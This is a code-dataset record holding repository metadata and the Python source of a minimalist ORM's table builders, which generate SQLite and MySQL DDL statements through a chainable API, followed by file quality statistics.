hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4bea7c7ad719970460f34be3e835a7e5e53c57d0
| 32,305
|
py
|
Python
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | 2
|
2015-12-17T23:32:12.000Z
|
2016-04-16T12:49:01.000Z
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | 1
|
2017-01-17T15:58:12.000Z
|
2017-01-17T15:58:12.000Z
|
mantis/builders/tablebuilder.py
|
Clivern/Mantis
|
5f80ef49d7e25b9368513bb059c4c3e712e87346
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Mantis
~~~~~~
A Minimalist ORM for Python
:copyright: (c) 2016 by Clivern (hello@clivern.com).
:license: MIT, see LICENSE for more details.
"""
from __future__ import print_function
class SQLiteTableBuilder(object):
    """SQLite Table Builder.

    Builds SQLite DDL statements through a chainable interface, e.g.::

        SQLiteTableBuilder().create_table('users').text('name').get()

    Commands and column definitions are queued first and translated into a
    single SQL string by :meth:`get`, which returns ``False`` when nothing
    valid was queued.
    """

    # Table name (kept for API parity; only ever reset inside this class)
    _table = None
    # A list of columns to create
    _columns = []
    # A list of commands to execute
    _commands = []
    # End Query to run
    _query = ""
    # Temp return values used to support chaining
    _temp = None
    # Query logger
    _logger = None

    def __init__(self):
        """Give every instance its own state.

        The class-level defaults above include mutable lists; without this,
        all instances would share the same ``_columns``/``_commands``.
        """
        self._table = None
        self._columns = []
        self._commands = []
        self._query = ""
        self._temp = None
        self._logger = None

    def set_logger(self, logger):
        """Set logger used to log generated queries."""
        self._logger = logger

    def _queue_command(self, command):
        """Reset builder state, queue *command* and return self (chaining)."""
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command(command)
        return self

    def create_table(self, table_name):
        """Create a new table in database."""
        return self._queue_command({
            'type': 'create_table',
            'table_name': table_name
        })

    def create_table_if_not_exists(self, table_name):
        """Create a new table in database only if it does not exist."""
        return self._queue_command({
            'type': 'create_table_if_not_exists',
            'table_name': table_name
        })

    def alter_table(self, table_name):
        """Alter table in database."""
        return self._queue_command({
            'type': 'alter_table',
            'table_name': table_name
        })

    def drop_table(self, table_name):
        """Drop table from database."""
        return self._queue_command({
            'type': 'drop_table',
            'table_name': table_name
        })

    def drop_table_if_exists(self, table_name):
        """Drop table from database only if it exists."""
        return self._queue_command({
            'type': 'drop_table_if_exists',
            'table_name': table_name
        })

    def rename_table(self, from_name, to_name):
        """Rename table from *from_name* to *to_name*."""
        return self._queue_command({
            'type': 'rename_table',
            'from_table_name': from_name,
            'to_table_name': to_name
        })

    def _simple_column(self, column_name, column_type):
        """Queue a column of *column_type* and return self (chaining)."""
        self._temp = [self._add_column(column_name, {
            'type': column_type,
        })]
        return self

    def text(self, column_name):
        """Add text column."""
        return self._simple_column(column_name, 'TEXT')

    def numeric(self, column_name):
        """Add numeric column."""
        return self._simple_column(column_name, 'NUMERIC')

    def integer(self, column_name):
        """Add integer column."""
        return self._simple_column(column_name, 'INTEGER')

    def real(self, column_name):
        """Add real column."""
        return self._simple_column(column_name, 'REAL')

    def blob(self, column_name):
        """Add blob column."""
        return self._simple_column(column_name, 'BLOB')

    def null(self, column_name):
        """Add null column."""
        return self._simple_column(column_name, 'NULL')

    def add(self):
        """Mark the most recently queued column(s) for addition."""
        for index in self._temp:
            self._columns[index]['parameters']['add'] = True
        return self

    def get(self):
        """Get Query from columns and commands.

        Returns the generated SQL string, or ``False`` when translation
        produced nothing (empty query).
        """
        self._translate()
        return False if (self._query == '') else self._query

    def reset(self, type=('table', 'columns', 'commands', 'query')):
        """Reset the selected parts of the builder state.

        *type* is an iterable containing any of ``'table'``, ``'columns'``,
        ``'commands'`` and ``'query'``; by default everything is reset.
        (The default is a tuple to avoid the shared mutable-default pitfall.)
        """
        if 'table' in type:
            self._table = None
        if 'columns' in type:
            self._columns = []
        if 'commands' in type:
            self._commands = []
        if 'query' in type:
            self._query = ""
        return self

    def _add_command(self, command):
        """Append *command* to storage and return its index."""
        self._commands.append(command)
        return len(self._commands) - 1

    def _add_column(self, column_name, parameters):
        """Append a column definition to storage and return its index."""
        self._columns.append({
            'column_name': column_name,
            'parameters': parameters
        })
        return len(self._columns) - 1

    def _translate(self):
        """Translate queued columns and commands into ``self._query``."""
        if (len(self._columns) > 0) and (len(self._commands) > 0):
            # Column-bearing flow (CREATE TABLE / ALTER TABLE)
            self._translate_columns()
        elif len(self._commands) > 0:
            # Command-only flow (DROP / RENAME)
            self._translate_commands()
        else:
            # Nothing queued: invalid state
            return False

    def _translate_columns(self):
        """Translate the first create/alter command using queued columns."""
        for command in self._commands:
            # Bug fix: 'create_table_if_not_exists' was previously not
            # dispatched here, so its query was never generated.
            if command['type'] in ('create_table', 'create_table_if_not_exists'):
                result = self._translate_create_table(command)
            elif command['type'] == 'alter_table':
                result = self._translate_alter_table(command)
            else:
                continue
            # Log the generated query if a logger is available (previously
            # unreachable on this path because of the early returns).
            if self._logger is not None:
                self._logger.log(self._query)
            return result
        # No translatable command found; keep original fallthrough behavior
        if self._logger is not None:
            self._logger.log(self._query)
        return True

    def _translate_commands(self):
        """Translate column-less commands (drop/rename) into SQL."""
        self._query = ""
        for command in self._commands:
            if command['type'] == 'drop_table_if_exists':
                self._query += "DROP TABLE IF EXISTS %s" % (command['table_name'])
            elif command['type'] == 'drop_table':
                self._query += "DROP TABLE %s" % (command['table_name'])
            elif command['type'] == 'rename_table':
                # SQLite uses ALTER TABLE ... RENAME TO for renames
                self._query += "ALTER TABLE %s RENAME TO %s" % (command['from_table_name'], command['to_table_name'])
            else:
                # Unknown command type: abort, leaving the query empty
                return False
        # Log the generated query if a logger is available
        if self._logger is not None:
            self._logger.log(self._query)
        return True

    def _translate_create_table(self, command):
        """Translate a create-table command plus queued columns into SQL."""
        if (command['type'] == 'create_table') and (command['table_name'] != ''):
            self._query = 'CREATE TABLE %s (\n ' % (command['table_name'])
        elif (command['type'] == 'create_table_if_not_exists') and (command['table_name'] != ''):
            self._query = 'CREATE TABLE IF NOT EXISTS %s (\n ' % (command['table_name'])
        else:
            # Invalid command or empty table name
            return False
        # Without columns a CREATE TABLE statement is meaningless
        if len(self._columns) <= 0:
            return False
        # Render each column as "<name> <TYPE>"
        nice_column = ["%s %s" % (column['column_name'], column['parameters']['type'])
                       for column in self._columns]
        if len(nice_column) <= 0:
            return False
        # Join column definitions and close the statement
        self._query += ",\n ".join(nice_column)
        self._query += '\n)'

    def _translate_alter_table(self, command):
        """Translate an alter-table command plus queued columns into SQL.

        NOTE(review): with multiple columns this emits one ALTER TABLE
        statement per line with no ';' separators — confirm callers split
        or execute these individually.
        """
        nice_column = []
        for column in self._columns:
            nice_column.append('ALTER TABLE %s ADD COLUMN %s %s' % (command['table_name'], column['column_name'], column['parameters']['type']))
        self._query += "\n".join(nice_column)
class MySQLTableBuilder(object):
    """MySQL Table Builder.

    Collects commands (create/alter/drop/rename/introspection) and column
    definitions through a chainable interface, then translates them into a
    single SQL string via :meth:`get` (``False`` when nothing valid queued).
    """

    # Table name (kept for API parity; only ever reset inside this class)
    _table = None
    # A list of columns to create
    _columns = []
    # A list of commands to execute
    _commands = []
    # Default engine
    _engine = "InnoDB"
    # Default charset
    _charset = "utf8"
    # Default collation
    _collation = "utf8_general_ci"
    # End Query to run
    _query = ""
    # Temp return values used to support chaining
    _temp = None
    # Query logger
    _logger = None

    def __init__(self):
        """Give every instance its own state.

        The class-level defaults above include mutable lists; without this,
        all instances would share the same ``_columns``/``_commands``.
        """
        self._table = None
        self._columns = []
        self._commands = []
        self._engine = "InnoDB"
        self._charset = "utf8"
        self._collation = "utf8_general_ci"
        self._query = ""
        self._temp = None
        self._logger = None

    def set_engine(self, engine):
        """Set storage engine (default InnoDB)."""
        self._engine = engine

    def set_charset(self, charset):
        """Set charset (default utf8)."""
        self._charset = charset

    def set_collation(self, collation):
        """Set collation (default utf8_general_ci)."""
        self._collation = collation

    def set_logger(self, logger):
        """Set logger used to log generated queries."""
        self._logger = logger

    def create_table(self, table_name):
        """Create a new table in database."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'create_table',
            'table_name': table_name
        })
        return self

    def create_table_if_not_exists(self, table_name):
        """Create a new table in database only if it does not exist."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'create_table_if_not_exists',
            'table_name': table_name
        })
        return self

    def alter_table(self, table_name):
        """Alter table in database."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'alter_table',
            'table_name': table_name
        })
        return self

    def drop_table(self, table_name):
        """Drop table from database."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'drop_table',
            'table_name': table_name
        })
        return self

    def drop_table_if_exists(self, table_name):
        """Drop table from database only if it exists."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'drop_table_if_exists',
            'table_name': table_name
        })
        return self

    def rename_table(self, from_name, to_name):
        """Rename table from *from_name* to *to_name*."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'rename_table',
            'from_table_name': from_name,
            'to_table_name': to_name
        })
        return self

    def has_table(self, table_name):
        """Check if table exist in database (SHOW TABLES LIKE)."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'has_table',
            'table_name': table_name
        })
        return self

    def has_column(self, table_name, column_name):
        """Check if column exist in table (SHOW COLUMNS FROM ... LIKE)."""
        # Reset table, columns and commands
        self.reset(['table', 'columns', 'commands', 'query'])
        self._add_command({
            'type': 'has_column',
            'table_name': table_name,
            'column_name': column_name
        })
        return self

    def big_increments(self, column_name, length=20):
        """Add big auto increments column (INT, clamped to 20 digits)."""
        length = length if (length <= 20) else 20
        self._temp = [self._add_column(column_name, {
            'type': 'INT(%s)' % (length),
            'length': length,
            'null': False,
            'auto_increment': True,
            'primary': True
        })]
        return self

    def increments(self, column_name, length=11):
        """Add auto increments column (INT, clamped to 11 digits)."""
        length = length if (length <= 11) else 11
        self._temp = [self._add_column(column_name, {
            'type': 'INT(%s)' % (length),
            'length': length,
            'null': False,
            'auto_increment': True,
            'primary': True
        })]
        return self

    def big_integer(self, column_name, length=20):
        """Add big integer column (BIGINT, clamped to 20 digits)."""
        length = length if (length <= 20) else 20
        self._temp = [self._add_column(column_name, {
            'type': 'BIGINT(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def integer(self, column_name, length=11):
        """Add integer column (INT, clamped to 11 digits)."""
        length = length if (length <= 11) else 11
        self._temp = [self._add_column(column_name, {
            'type': 'INT(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def medium_integer(self, column_name, length=9):
        """Add medium integer column (MEDIUMINT, clamped to 9 digits)."""
        length = length if (length <= 9) else 9
        self._temp = [self._add_column(column_name, {
            'type': 'MEDIUMINT(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def small_integer(self, column_name, length=6):
        """Add small integer column (SMALLINT, clamped to 6 digits)."""
        length = length if (length <= 6) else 6
        self._temp = [self._add_column(column_name, {
            'type': 'SMALLINT(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def tiny_integer(self, column_name, length=4):
        """Add tiny integer column (TINYINT, clamped to 4 digits)."""
        length = length if (length <= 4) else 4
        self._temp = [self._add_column(column_name, {
            'type': 'TINYINT(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def binary(self, column_name, length=255):
        """Add binary column (clamped to 255)."""
        length = length if (length <= 255) else 255
        self._temp = [self._add_column(column_name, {
            'type': 'BINARY(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def boolean(self, column_name):
        """Add boolean column."""
        self._temp = [self._add_column(column_name, {
            'type': 'BOOLEAN',
            'null': False
        })]
        return self

    def string(self, column_name, length=250):
        """Add varchar column (clamped to 250)."""
        length = length if (length <= 250) else 250
        self._temp = [self._add_column(column_name, {
            'type': 'VARCHAR(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def varchar(self, column_name, length=250):
        """Add varchar column (clamped to 250); alias of string()."""
        length = length if (length <= 250) else 250
        self._temp = [self._add_column(column_name, {
            'type': 'VARCHAR(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def char(self, column_name, length=255):
        """Add char column (clamped to 255)."""
        length = length if (length <= 255) else 255
        self._temp = [self._add_column(column_name, {
            'type': 'CHAR(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def decimal(self, column_name, length, decimals):
        """Add decimal column."""
        self._temp = [self._add_column(column_name, {
            'type': 'DECIMAL(%s,%s)' % (length, decimals),
            'length': length,
            'decimals': decimals,
            'null': False
        })]
        return self

    def double(self, column_name, length, decimals):
        """Add double column."""
        self._temp = [self._add_column(column_name, {
            'type': 'DOUBLE(%s,%s)' % (length, decimals),
            'length': length,
            'decimals': decimals,
            'null': False
        })]
        return self

    def enum(self, column_name, choices=None):
        """Add enum column built from *choices*."""
        # Avoid the shared mutable-default-argument pitfall
        choices = [] if choices is None else choices
        self._temp = [self._add_column(column_name, {
            'type': "ENUM('%s')" % "','".join(choices),
            'choices': choices,
            'null': False
        })]
        return self

    def float(self, column_name, length, decimals):
        """Add float column."""
        self._temp = [self._add_column(column_name, {
            'type': 'FLOAT(%s,%s)' % (length, decimals),
            'length': length,
            'decimals': decimals,
            'null': False
        })]
        return self

    def long_blob(self, column_name):
        """Add long blob column."""
        self._temp = [self._add_column(column_name, {
            'type': 'LONGBLOB',
            'null': False
        })]
        return self

    def medium_blob(self, column_name):
        """Add medium blob column."""
        self._temp = [self._add_column(column_name, {
            'type': 'MEDIUMBLOB',
            'null': False
        })]
        return self

    def tiny_blob(self, column_name):
        """Add tiny blob column."""
        self._temp = [self._add_column(column_name, {
            'type': 'TINYBLOB',
            'null': False
        })]
        return self

    def blob(self, column_name):
        """Add blob column."""
        self._temp = [self._add_column(column_name, {
            'type': 'BLOB',
            'null': False
        })]
        return self

    def long_text(self, column_name):
        """Add long text column."""
        self._temp = [self._add_column(column_name, {
            'type': 'LONGTEXT',
            'null': False
        })]
        return self

    def medium_text(self, column_name):
        """Add medium text column."""
        self._temp = [self._add_column(column_name, {
            'type': 'MEDIUMTEXT',
            'null': False
        })]
        return self

    def tiny_text(self, column_name):
        """Add tiny text column."""
        self._temp = [self._add_column(column_name, {
            'type': 'TINYTEXT',
            'null': False
        })]
        return self

    def text(self, column_name):
        """Add text column."""
        self._temp = [self._add_column(column_name, {
            'type': 'TEXT',
            'null': False
        })]
        return self

    def time(self, column_name):
        """Add time column."""
        self._temp = [self._add_column(column_name, {
            'type': 'TIME',
            'null': False
        })]
        return self

    def year(self, column_name, length=4):
        """Add year column (only 2- or 4-digit display; defaults to 4)."""
        length = length if ((length == 4) or (length == 2)) else 4
        self._temp = [self._add_column(column_name, {
            'type': 'YEAR(%s)' % (length),
            'length': length,
            'null': False
        })]
        return self

    def datetime(self, column_name):
        """Add datetime column."""
        self._temp = [self._add_column(column_name, {
            'type': 'DATETIME',
            'null': False
        })]
        return self

    def date(self, column_name):
        """Add date column."""
        self._temp = [self._add_column(column_name, {
            'type': 'DATE',
            'null': False
        })]
        return self

    def timestamp(self, column_name):
        """Add timestamp column."""
        self._temp = [self._add_column(column_name, {
            'type': 'TIMESTAMP',
            'null': False
        })]
        return self

    def timestamps(self):
        """Add 'created_at' and 'updated_at' timestamps columns."""
        self._temp = [self._add_column('created_at', {
            'type': 'TIMESTAMP',
            'null': False
        }), self._add_column('updated_at', {
            'type': 'TIMESTAMP',
            'null': False
        })]
        return self

    def nullable_timestamps(self):
        """Add nullable 'created_at' and 'updated_at' timestamps columns."""
        self._temp = [self._add_column('created_at', {
            'type': 'TIMESTAMP',
            'null': True
        }), self._add_column('updated_at', {
            'type': 'TIMESTAMP',
            'null': True
        })]
        return self

    def nullable(self):
        """Mark the most recently queued column(s) as nullable."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['null'] = True
        return self

    def not_nullable(self):
        """Mark the most recently queued column(s) as not nullable."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['null'] = False
        return self

    def null(self):
        """Mark the most recently queued column(s) as nullable (alias)."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['null'] = True
        return self

    def not_null(self):
        """Mark the most recently queued column(s) as not nullable (alias)."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['null'] = False
        return self

    def auto_increment(self):
        """Mark column as auto incremented (implies primary key)."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['auto_increment'] = True
            self._columns[_temp]['parameters']['primary'] = True
        return self

    def primary(self):
        """Mark column as primary key."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['primary'] = True
        return self

    def index(self):
        """Mark column as index."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['index'] = True
        return self

    def key(self):
        """Mark column as index (alias of index())."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['index'] = True
        return self

    def default(self, default_value):
        """Add default value to the column."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['default'] = default_value
        return self

    def add(self):
        """Mark the most recently queued column(s) for ALTER ... ADD."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['add'] = True
        return self

    def modify(self):
        """Mark the most recently queued column(s) for ALTER ... MODIFY."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['modify'] = True
        return self

    def drop(self):
        """Mark the most recently queued column(s) for ALTER ... DROP."""
        for _temp in self._temp:
            self._columns[_temp]['parameters']['drop'] = True
        return self

    def get(self):
        """Get Query from columns and commands.

        Returns the generated SQL string, or ``False`` when translation
        produced nothing (empty query).
        """
        self._translate()
        return False if (self._query == '') else self._query

    def reset(self, type=('table', 'columns', 'commands', 'engine', 'charset', 'collation', 'query')):
        """Reset the selected parts of the builder state.

        *type* is an iterable of any of 'table', 'columns', 'commands',
        'engine', 'charset', 'collation', 'query'; the default resets
        everything. (Tuple default avoids the shared-mutable pitfall.)
        """
        if 'table' in type:
            self._table = None
        if 'columns' in type:
            self._columns = []
        if 'commands' in type:
            self._commands = []
        if 'engine' in type:
            self._engine = "InnoDB"
        if 'charset' in type:
            self._charset = "utf8"
        if 'collation' in type:
            self._collation = "utf8_general_ci"
        if 'query' in type:
            self._query = ""
        return self

    def _add_command(self, command):
        """Append *command* to storage and return its index."""
        self._commands.append(command)
        return len(self._commands) - 1

    def _add_column(self, column_name, parameters):
        """Append a column definition to storage and return its index."""
        self._columns.append({
            'column_name': column_name,
            'parameters': parameters
        })
        return len(self._columns) - 1

    def _translate(self):
        """Translate queued columns and commands into ``self._query``."""
        if (len(self._columns) > 0) and (len(self._commands) > 0):
            # Column-bearing flow (CREATE TABLE / ALTER TABLE)
            self._translate_columns()
        elif len(self._commands) > 0:
            # Command-only flow (DROP / RENAME / SHOW)
            self._translate_commands()
        else:
            # Nothing queued: invalid state
            return False

    def _translate_columns(self):
        """Translate the first create/alter command using queued columns."""
        for command in self._commands:
            # Bug fix: 'create_table_if_not_exists' was previously not
            # dispatched here, so its query was never generated.
            if command['type'] in ('create_table', 'create_table_if_not_exists'):
                result = self._translate_create_table(command)
            elif command['type'] == 'alter_table':
                result = self._translate_alter_table(command)
            else:
                continue
            # Log the generated query if a logger is available (previously
            # unreachable on this path because of the early returns).
            if self._logger is not None:
                self._logger.log(self._query)
            return result
        # No translatable command found; keep original fallthrough behavior
        if self._logger is not None:
            self._logger.log(self._query)
        return True

    def _translate_commands(self):
        """Translate column-less commands (drop/rename/show) into SQL."""
        self._query = ""
        for command in self._commands:
            if command['type'] == 'drop_table_if_exists':
                self._query += "DROP TABLE IF EXISTS `%s`" % (command['table_name'])
            elif command['type'] == 'drop_table':
                self._query += "DROP TABLE `%s`" % (command['table_name'])
            elif command['type'] == 'rename_table':
                self._query += "RENAME TABLE %s TO %s" % (command['from_table_name'], command['to_table_name'])
            elif command['type'] == 'has_column':
                self._query += "SHOW COLUMNS FROM `%s` LIKE '%s'" % (command['table_name'], command['column_name'])
            elif command['type'] == 'has_table':
                self._query += "SHOW TABLES LIKE '%s'" % (command['table_name'])
            else:
                # Unknown command type: abort, leaving the query empty
                return False
        # Log the generated query if a logger is available
        if self._logger is not None:
            self._logger.log(self._query)
        return True

    def _translate_create_table(self, command):
        """Translate a create-table command plus queued columns into SQL."""
        if (command['type'] == 'create_table') and (command['table_name'] != ''):
            self._query = 'CREATE TABLE `%s` (\n ' % (command['table_name'])
        elif (command['type'] == 'create_table_if_not_exists') and (command['table_name'] != ''):
            self._query = 'CREATE TABLE IF NOT EXISTS `%s` (\n ' % (command['table_name'])
        else:
            # Invalid command or empty table name
            return False
        # Column definitions, then key/index clauses
        nice_column = []
        nice_commands = []
        # Set to " AUTO_INCREMENT=1" when any column auto-increments
        auto_increment_indicator = ""
        # Without columns a CREATE TABLE statement is meaningless
        if len(self._columns) <= 0:
            return False
        for column in self._columns:
            attrs = ""
            # NULL / NOT NULL
            if ('null' in column['parameters']) and (not column['parameters']['null']):
                attrs += " NOT NULL"
            else:
                attrs += " NULL"
            # AUTO_INCREMENT (also forces the table-level counter clause)
            if ('auto_increment' in column['parameters']) and (column['parameters']['auto_increment']):
                attrs += " AUTO_INCREMENT"
                auto_increment_indicator = " AUTO_INCREMENT=1"
            # DEFAULT value
            if ('default' in column['parameters']) and (column['parameters']['default'] != ""):
                attrs += " DEFAULT '%s'" % (column['parameters']['default'])
            nice_column.append("`%s` %s%s" % (column['column_name'], column['parameters']['type'], attrs))
            # PRIMARY KEY clause
            if ('primary' in column['parameters']) and (column['parameters']['primary']):
                nice_commands.append("PRIMARY KEY (`%s`)" % (column['column_name']))
            # KEY (index) clause
            if ('index' in column['parameters']) and (column['parameters']['index']):
                nice_commands.append("KEY `%s` (`%s`)" % (column['column_name'], column['column_name']))
        # Concatenate column definitions followed by key clauses
        all_commands = nice_column + nice_commands
        if len(all_commands) <= 0:
            return False
        self._query += ",\n ".join(all_commands)
        # Close statement with engine/charset (and auto-increment counter)
        if ((command['type'] == 'create_table_if_not_exists') or (command['type'] == 'create_table')) and (command['table_name'] != ''):
            self._query += '\n) ENGINE=%s DEFAULT CHARSET=%s%s' % (self._engine, self._charset, auto_increment_indicator)
        else:
            return False

    def _translate_alter_table(self, command):
        """Translate an alter-table command plus queued columns into SQL.

        NOTE(review): with multiple columns the actions are joined by bare
        newlines (no commas), which is not a single valid MySQL statement —
        confirm callers only alter one column at a time.
        """
        if (command['type'] == 'alter_table') and (command['table_name'] != ''):
            self._query = 'ALTER TABLE %s\n' % (command['table_name'])
        nice_column = []
        for column in self._columns:
            attrs = ""
            action_type = "ADD"
            # Pick the action marked on the column (default ADD)
            if ('add' in column['parameters']) and (column['parameters']['add']):
                action_type = "ADD"
            elif ('modify' in column['parameters']) and (column['parameters']['modify']):
                action_type = "MODIFY"
            elif ('drop' in column['parameters']) and (column['parameters']['drop']):
                action_type = "DROP"
            else:
                action_type = "ADD"
            # NULL / NOT NULL (not meaningful for DROP)
            if ('null' in column['parameters']) and (not column['parameters']['null']) and (action_type != 'DROP'):
                attrs += " NOT NULL"
            elif (action_type != 'DROP'):
                attrs += " NULL"
            # AUTO_INCREMENT (not meaningful for DROP)
            if ('auto_increment' in column['parameters']) and (column['parameters']['auto_increment']) and (action_type != 'DROP'):
                attrs += " AUTO_INCREMENT"
            # DEFAULT value (not meaningful for DROP)
            if ('default' in column['parameters']) and (column['parameters']['default'] != "") and (action_type != 'DROP'):
                attrs += " DEFAULT '%s'" % (column['parameters']['default'])
            nice_column.append('%s %s %s%s' % (action_type, column['column_name'], column['parameters']['type'], attrs))
        self._query += "\n".join(nice_column)
class PostgreSQLTableBuilder(object):
    """PostgreSQL Table Builder.

    Placeholder only — no commands or columns are implemented yet; see
    SQLiteTableBuilder / MySQLTableBuilder for the intended interface.
    """
    pass
| 30.419021
| 144
| 0.539359
| 3,485
| 32,305
| 4.806026
| 0.05538
| 0.051943
| 0.051227
| 0.033136
| 0.855872
| 0.813302
| 0.762792
| 0.741537
| 0.7207
| 0.663562
| 0
| 0.004503
| 0.33323
| 32,305
| 1,061
| 145
| 30.447691
| 0.773073
| 0.166104
| 0
| 0.761755
| 0
| 0
| 0.144072
| 0.004937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0.001567
| 0.001567
| 0
| 0.308777
| 0.001567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
